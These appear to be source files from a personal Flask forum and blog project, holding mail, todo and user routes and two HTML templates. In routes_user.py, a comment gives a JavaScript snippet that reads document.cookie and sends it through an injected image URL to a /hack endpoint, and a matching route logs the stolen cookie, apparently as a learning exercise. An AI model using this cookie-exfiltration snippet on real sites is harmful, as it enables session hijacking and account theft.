server_normal_Flask_beautiful/routes/routes_mail.py
from utils import log
from models.mail import Mail
from models.user import User
from flask import (
    request,
    Blueprint,
    render_template,
    redirect,
    url_for,
    session,
    make_response,
    abort,
)
from routes import (
    login_required,
    current_user,
)
from config import gg

main = Blueprint('mail', __name__)


# mail是私人的，只有自己可以看
@main.route('/index', methods=['GET'])
@login_required
def index():
    """
    显示该用户所有mail
    :return: 显示mail页面
    """
    user = current_user()
    if user is not None:
        print('from mail_index  before', gg.csrf_tokens)
        gg.reset_value(user.id)
        print('from mail_index  after', gg.csrf_tokens)

        send_mail = Mail.find_all(sender_id=user.id, sender_deleted=False)
        received_mail = Mail.find_all(receiver_id=user.id, receiver_deleted=False)
        return render_template('mail/mail_index.html', sends=send_mail, receives=received_mail, token=gg.token[user.id],
                               user=user)
    else:
        abort(401)


@main.route('/new/<int:to_user_id>', methods=['GET'])
@login_required
def new(to_user_id):
    user = current_user()
    if Mail.check_token():
        return render_template('mail/mail_new.html', token=gg.token[user.id], to_user_id=to_user_id, user=user)


@main.route('/add', methods=['POST'])
@login_required
def add():
    if Mail.check_token():
        form = request.form
        # form里面有title，content，sender_id，receiver_id
        m = Mail.new(form)
        # 管理员 回到管理员 界面
        if current_user().id == 1:
            return redirect(url_for('user.admin'))
        return redirect(url_for('.index'))


# 群发私信
@main.route('/admin_add', methods=['POST'])
@login_required
def admin_add():
    if Mail.check_token():
        User.check_admin()
        form = request.form
        for u in User.find_all():
            if u.id != 1:
                m = Mail.new(form, receiver_id=u.id)
        return redirect(url_for('user.admin', token=gg.token[current_user().id]))


@main.route('/delete/<int:mail_id>', methods=['GET'])
@login_required
def delete(mail_id):
    if Mail.check_token():
        Mail.receiver_sender_delete(mail_id)
        return redirect(url_for('.index'))


@main.route('/edit/<int:mail_id>', methods=['GET'])
@login_required
def edit(mail_id):
    user = current_user()
    if Mail.check_token():
        # mail_id = int(request.args.get('id', -1))
        m = Mail.find(mail_id)
        if current_user().id in [m.receiver_id, m.sender_id]:
            return render_template('mail/mail_edit.html', m=m, token=gg.token[user.id], user=user)
        else:
            abort(401)

@main.route('/update/<int:mail_id>', methods=['POST'])
@login_required
def update(mail_id):
    if Mail.check_token():
        form = request.form
        m = Mail.find(mail_id)
        if current_user().id in [m.receiver_id, m.sender_id]:
            Mail.update(form)
            # redirect有必要加query吗
            return redirect(url_for('.index'))
        else:
            abort(401)


@main.route('/detail/<int:mail_id>', methods=['GET'])
@login_required
def detail(mail_id):
    user = current_user()
    m = Mail.mark_read(mail_id)
    if user is not None:
        # 保证每次调用index函数时清空gg,保证每次调用index函数时都有新的token可用
        print('from mail_detail  before', gg.csrf_tokens)
        gg.reset_value(user.id)
        print('from mail_detail  after', gg.csrf_tokens)
        return render_template('mail/mail_detail.html', m=m, token=gg.token[user.id], user=user)
    return render_template('mail/mail_detail.html', m=m, user=user)

server_normal_Flask_beautiful/routes/routes_todo.py
from utils import log
from routes import (
    login_required,
    current_user,
)

from flask import (
    request,
    Blueprint,
    render_template,
    redirect,
    url_for,
    session,
    make_response,
    abort,
)

from models import change_time
from models.todo import Todo
import time
from config import gg


main = Blueprint('todo', __name__)


@main.route('/index', methods=['GET'])
@login_required
def index():
    """
    显示该用户所有todo
    :return: 显示todo页面
    """
    user = current_user()
    print('from todo_index  before', gg.csrf_tokens)
    gg.reset_value(user.id)
    print('from todo_index  after', gg.csrf_tokens)
    return render_template('todo/todo_index.html', token=gg.token[user.id], user=user)


# GET 去 new 页面， POST tweet_index 页面
@main.route('/add', methods=['GET', 'POST'])
@login_required
def add():
    """
    添加todo
    :return: 返回index页面
    """
    user = current_user()
    if Todo.check_token():
        form = request.form
        if form.get('title'):
            t = Todo.new(form, user_id=user.id)
            return redirect(url_for('.index'))
        else:
            return render_template('todo/todo_new.html', token=gg.token[user.id], user=user)


@main.route('/edit/<int:todo_id>', methods=['GET'])
@login_required
def edit(todo_id):
    user = current_user()
    if Todo.check_token():
        # todo_id = int(request.args.get('id'))
        t = Todo.find_by(id=todo_id)
        Todo.check_id(id=todo_id)
        return render_template('todo/todo_edit.html', t=t, token=gg.token[user.id], user=user)


@main.route('/update', methods=['POST'])
@login_required
def update():
    if Todo.check_token():
        form = request.form
        Todo.check_id(form)
        Todo.update(form)
        return redirect(url_for('.index'))


@main.route('/delete/<int:todo_id>', methods=['GET'])
@login_required
def delete(todo_id):
    if Todo.check_token():
        Todo.check_id(id=todo_id)
        Todo.remove(todo_id)
        return redirect(url_for('.index'))


@main.route('/status_switch/<int:todo_id>', methods=['GET'])
@login_required
def switch(todo_id):
    if Todo.check_token():
        Todo.check_id(id=todo_id)
        status = request.args.get('status')
        t = Todo.complete(todo_id, status)
        return redirect(url_for('.index'))


@main.route('/detail/<int:todo_id>', methods=['GET'])
@login_required
def detail(todo_id):
    user = current_user()
    t = Todo.find(todo_id)
    if user is not None:
        # 保证每次调用index函数时清空gg,保证每次调用index函数时都有新的token可用
        print('from todo_datail  before', gg.csrf_tokens)
        gg.reset_value(user.id)
        print('from todo_datail  after', gg.csrf_tokens)
        return render_template('todo/todo_detail.html', t=t, token=gg.token[user.id], user=user)
    return render_template('todo/todo_detail.html', t=t, user=user)

server_normal_Flask_beautiful/routes/routes_user.py
from utils import log
from config import  gg, image_file_dir
from routes import (
    current_user,
    login_required,
)

from flask import (
    request,
    Blueprint,
    render_template,
    redirect,
    url_for,
    session,
    make_response,
    send_from_directory,
    abort,
    flash,
)
from models.user import User
from models.board import Board
from models.mail import Mail


main = Blueprint('user', __name__)


@main.route('/', methods=['GET'])
def index():
    return render_template('blog/blog_index.html')


@main.route('/admin', methods=['GET'])
@login_required
def admin():
    """
    只有用户id为1的用户有权限
    :return: 返回所有用户的信息
    """
    user = current_user()
    User.check_admin()
    print('from admin  before', gg.csrf_tokens)
    gg.reset_value(user.id)
    print('from admin  after', gg.csrf_tokens)
    return render_template('user/admin.html', token=gg.token[user.id], mails=Mail.find_all(), user=user, users=User.find_all(), boards=Board.find_all())


@main.route('/admin/edit/<int:user_id>', methods=['GET'])
@login_required
def admin_edit(user_id):
    """
    只有用户id为1的用户有权限，输入需要修改的id和password
    :return: 返回修改过的所有用户的信息
    """
    user = current_user()
    if User.check_token():
        User.check_admin()
        u = User.find(user_id)
        return render_template('user/admin_edit.html', token=gg.token[user.id], user=user, u=u)


@main.route('/admin/update', methods=['POST'])
@login_required
def admin_update():
    """
    只有用户id为1的用户有权限，输入需要修改的id和password
    :return: 返回修改过的所有用户的信息
    """
    if User.check_token():
        User.check_admin()
        form = request.form
        User.update(form)
        return redirect(url_for('.admin'))


# 增加一个register的路由函数
@main.route('/admin/register', methods=['POST'])
def admin_register():
    """
    允许GET是因为在地址栏输入地址转到register页面需要
    POST是因为在register页面输入账号密码点击register按钮需要
    主要的bug是转到register页面和register页面都都是同一个路由函数
    :return: 返回register页面，并显示所有用户信息
    """
    if User.check_token():
        User.check_admin()
        form = request.form
        if User.validate_register(form):
            return redirect(url_for('.admin'))


@main.route('/admin/delete/<int:user_id>')
@login_required
def user_delete(user_id):
    if User.check_token():
        User.check_admin()
        User.remove(user_id)
        return redirect(url_for('.admin'))


# 所有用户上传头像,先存在本地得到路径之后上传至七牛云，并删除本地图片
@main.route('/add_image', methods=['POST'])
@login_required
def add_img():
    user = current_user()
    if User.check_token():
        file = request.files['avatar']
        user.save_and_up(file)
        return redirect(url_for('.user_setting', id=user.id, token=gg.token[user.id]))


# web后端上传头像，后续可以改成Nginx+图床
# 本地只有default.png一张图片
@main.route('/uploads/<filename>')
@login_required
def uploads(filename):
    return send_from_directory(image_file_dir, filename)


# 在知乎console输入
# var c = document.cookie
# var img = `<img src='http://localhost:4000/hack?cookie=${c}'>`
# document.body.innerHTML += img
@main.route('/hack')
def hack():
    # xss 攻击的后台
    cookie = request.args.get('cookie')
    print('cookie', cookie)


# 增加一个可以看到任意user的路由函数
# 不需要check token，CRUD中除了查不需要验证token，但是需要传递token
# 需要传递   u: 我想要看的用户    和    user: current_user()
@main.route('/user/<int:id>')
# @login_required
def user_detail(id):
    user = current_user()
    u = User.find(id)
    if u is None:
        abort(404)
    if user is not None:
        # 保证每次调用index函数时清空gg,保证每次调用index函数时都有新的token可用
        print('from profile  before', gg.csrf_tokens)
        gg.reset_value(user.id)
        print('from profile  after', gg.csrf_tokens)
        return render_template('user/profile.html', u=u, token=gg.token[user.id], user=user)
    return render_template('user/profile.html', u=u, user=user)


# update方法需要重新写，统一到model父类中
# 增加一个在setting页面update的路由函数
@main.route('/user/update', methods=['POST'])
@login_required
def user_update():
    user = current_user()
    if User.check_token():
        form = request.form
        user.password_update(form)
        return redirect(url_for('user.user_setting', id=user.id, token=gg.token[user.id]))


# 增加一个去setting页面的路由函数
@main.route('/setting')
@login_required
def user_setting():
    user = current_user()
    if user is not None:
        # 保证每次调用index函数时清空gg,保证每次调用index函数时都有新的token可用
        print('from setting  before', gg.csrf_tokens)
        gg.reset_value(user.id)
        print('from setting  after', gg.csrf_tokens)
        return render_template('user/setting.html', user=user, token=gg.token[user.id], bid=-1)


# GET 去 登陆 页面， POST 提交表单
@main.route('/login', methods=['GET', 'POST'])
def user_login():
    form = request.form
    log('from route_login --> cookies: ', request.cookies)
    # ImmutableMultiDict([])是什么鬼？
    if form.get('username', None):
        if User.validate_login(form):
            u = User.find_by(username=form.get('username'))
            print('from signin  before', session)
            session['user_id'] = u.id
            print('from signin  after', session)
            return redirect(url_for('tweet.index'))
        else:
            flash('账号密码输入错误，请核对后再输入')
            return redirect(url_for('.user_login'))
    else:
        return render_template('user/login.html')


# GET 去  注册 页面， POST 提交表单
@main.route('/register', methods=['GET', 'POST'])
def user_register():
    """
    允许GET是因为在地址栏输入地址转到register页面需要
    POST是因为在register页面输入账号密码点击register按钮需要
    主要的bug是转到register页面和register页面都都是同一个路由函数
    :return: 返回register页面，并显示所有用户信息
    """
    form = request.form
    if form.get('username', None):
        if User.validate_register(form):
            return redirect(url_for('user.user_login'))
        else:
            flash('用户名和密码长度必须大于2，请核对后再输入')
            return redirect(url_for('.user_register'))
    else:
        return render_template('user/register.html')


@main.route('/signout')
def user_signout():
    """
    在session中删除当前登录的user_id
    :return: 返回login页面
    """
    if User.check_token():
        print('from signout  before', session)
        session.pop('user_id')
        print('from signout  after', session)
        return redirect(url_for('tweet.index'))

server_normal_Flask_beautiful/templates/base.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>{% block title %}{% endblock %} - My Webpage</title>
    <link rel="shortcut icon" href="{{ url_for('static', filename='favicon.ico') }}" type="image/x-icon">
    <link rel="icon" href="{{ url_for('static', filename='favicon.ico') }}" type="image/x-icon">
    <link href="/static/css/base.css" rel="stylesheet">
    {#Nodejs使用的css#}
    <link rel="stylesheet" href="//o4j806krb.qnssl.com/public/stylesheets/index.min.23a5b1ca.min.css" media="all">

</head>
<body>
<div class='navbar'>
    <div class='navbar-inner'>
        <div class='container'>
            <a class="brand" href="{{ url_for('tweet.index') }}">
                <img src="//o4j806krb.qnssl.com/public/images/cnodejs_light.svg">
            </a>
            <ul class='nav pull-right'>
                <li><a href="{{ url_for('tweet.index') }}">首页</a></li>
                {% if user %}
                    <li><a href="{{ url_for('todo.index') }}">待办事项</a></li>
                    <li><a href="{{ url_for('mail.index') }}">未读消息</a></li>
                    <li><a href="{{ url_for('user.user_setting') }}">设置</a></li>
                    <li><a href="{{ url_for('user.user_signout', token=token) }}">退出</a></li>
                    {% if user.id == 1 %}
                        <li><a href="{{ url_for('user.admin') }}">管理员界面</a></li>
                    {% endif %}
                {% else %}
                    <li><a href="{{ url_for('user.user_login') }}">登录</a></li>
                    <li><a href="{{ url_for('user.user_register') }}">注册</a></li>
                {% endif %}

            </ul>
        </div>
    </div>
</div>

<div id="main">
    <div id="sidebar">
        {% block sidebar_panel %}{% endblock %}
    </div>
    <div id="content">
        {% block content %}{% endblock %}
    </div>
</div>

<div id='footer'>
    <div id='footer_main'>
        <div class="links">
            <a class='dark' href='https://github.com/KiwiShow/PythonWeb'>源码地址</a>
        </div>

        <div class='col_fade'>

            <p>这是个人的一个玩具，模仿<a href="https://cnodejs.org/">CNode</a>(国内最专业的 Node.js 开源技术社区，致力于 Node.js 的技术研究)</p>
            <p>欢迎来到python社区
                <a href="https://www.python.org/"
                   target="_blank"
                   class="sponsor_outlink" data-label="ucloud_bottom">
                    <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/f/f8/Python_logo_and_wordmark.svg/200px-Python_logo_and_wordmark.svg.png"
                         title="python"
                         alt="python" width="92px"/>
                </a>
                ，云存储使用
                <a href="http://www.qiniu.com/?ref=cnode" target="_blank"
                   class="sponsor_outlink" data-label="qiniu_bottom">
                    <img src="//dn-cnode.qbox.me/Fg0jtDIcTqVC049oVu5-sn6Om4NX" title="七牛云存储"
                         alt="七牛云存储" width="115px"/>
                </a>
                ，使用<a href="http://flask.pocoo.org/" target="_blank"
                      class="sponsor_outlink" data-label="alinode_bottom">
                    <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/3c/Flask_logo.svg/220px-Flask_logo.svg.png"
                         title="flask"
                         alt="flask" height="54px" width="166px"/>
                </a>web框架。
            </p>
        </div>
    </div>
</div>

{% block script %}
    {#Nodejs使用的库#}
    <script src="//o4j806krb.qnssl.com/public/index.min.f7c13f64.min.js"></script>
    <script src="//o4j806krb.qnssl.com/public/editor.min.08791783.min.js"></script>

    {#Markdown库#}
    <script src="//cdn.bootcss.com/marked/0.3.19/marked.min.js"></script>
    {#时间库及中文locale#}
    <script src="//cdn.bootcss.com/moment.js/2.22.0/moment.min.js"></script>
    <script src="//cdn.bootcss.com/moment.js/2.22.0/locale/zh-cn.js"></script>
    {#自己的js#}
    <script src="/static/js/base.js"></script>

    <script>
        {#调用base.js 里面的函数#}
        let main = function () {
            createTimer()
            markContents()
            new_edit()
        }
        main()
    </script>
{% endblock %}
</body>
</html>

server_normal_Flask_beautiful/templates/blog_base.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <title>{% block title %}{% endblock %} - 博客-caiwei's blog</title>
    <link rel="shortcut icon" href="{{ url_for('static', filename='favicon.ico') }}" type="image/x-icon">
    <link rel="icon" href="{{ url_for('static', filename='favicon.ico') }}" type="image/x-icon">

    <!-- Bootstrap core CSS -->
    {#    这个不用本地会 出现 nav bar 消失, 4.0.0的可以#}
    {#    <link href="../../static/css/bootstrap.min.css" rel="stylesheet">#}
    <link href="//cdn.bootcss.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet">

    <!-- Custom styles for this template -->
    {#    这个不用本地会 格式错误#}
    <link href="/static/css/clean-blog.min.css" rel="stylesheet">
    {#    <link href="https://cdn.bootcss.com/startbootstrap-clean-blog/3.3.7/css/clean-blog.min.css" rel="stylesheet">#}

    <!-- Custom fonts for this template -->
    <link href="//cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">
    <link href='//fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet'
          type='text/css'>
    <link href='//fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800'
          rel='stylesheet' type='text/css'>
</head>

<body>

<!-- Navigation -->
<nav class="navbar navbar-expand-lg navbar-light fixed-top" id="mainNav">
    <div class="container">
        <a class="navbar-brand" href="{{ url_for('user.index') }}">Blog</a>
        <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse"
                data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false"
                aria-label="Toggle navigation">
            Menu
            <i class="fa fa-bars"></i>
        </button>
        <div class="collapse navbar-collapse" id="navbarResponsive">
            <ul class="navbar-nav ml-auto">
                <li class="nav-item">
                    <a class="nav-link" href="{{ url_for('user.index') }}">Home</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link" href="{{ url_for('tweet.index') }}">Tweets</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link" href="http://v3.bootcss.com/css/">Bootcss参考</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link" href="http://docs.jinkan.org/docs/flask/index.html">Flask</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link" href="http://docs.jinkan.org/docs/jinja2/index.html">Jinja2</a>
                </li>
            </ul>
        </div>
    </div>
</nav>

<!-- Page Header -->
<header class="masthead" style="background-image: url('../static/image/home-bg.jpg')">
    <div class="overlay"></div>
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-md-10 mx-auto">
                {% block page_header %}{% endblock %}
            </div>
        </div>
    </div>
</header>

<!-- Main Content -->
{% block Main_content %}{% endblock %}

<hr>
<!-- Footer -->
<footer>
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-md-10 mx-auto">
                <ul class="list-inline text-center">
                    <li class="list-inline-item">
                        <a href="https://github.com/KiwiShow">
                            <span class="fa-stack fa-lg">
                                <i class="fa fa-circle fa-stack-2x"></i>
                                <i class="fa fa-github fa-stack-1x fa-inverse"></i>
                            </span>
                        </a>
                    </li>
                </ul>
                <p class="copyright text-muted">Copyright &copy; Cai Wei 2018</p>
            </div>
        </div>
    </div>
</footer>

{% block script %}
    <!-- Bootstrap core JavaScript -->
    <script src="//cdn.bootcss.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>
    <script src="//cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>

    <!-- Custom scripts for this template -->
{#    <script src="//cdn.bootcss.com/startbootstrap-clean-blog/3.3.7+1/js/clean-blog.min.js"></script>#}
    <script src="/static/js/clean-blog.min.js"></script>

{% endblock %}

</body>
</html>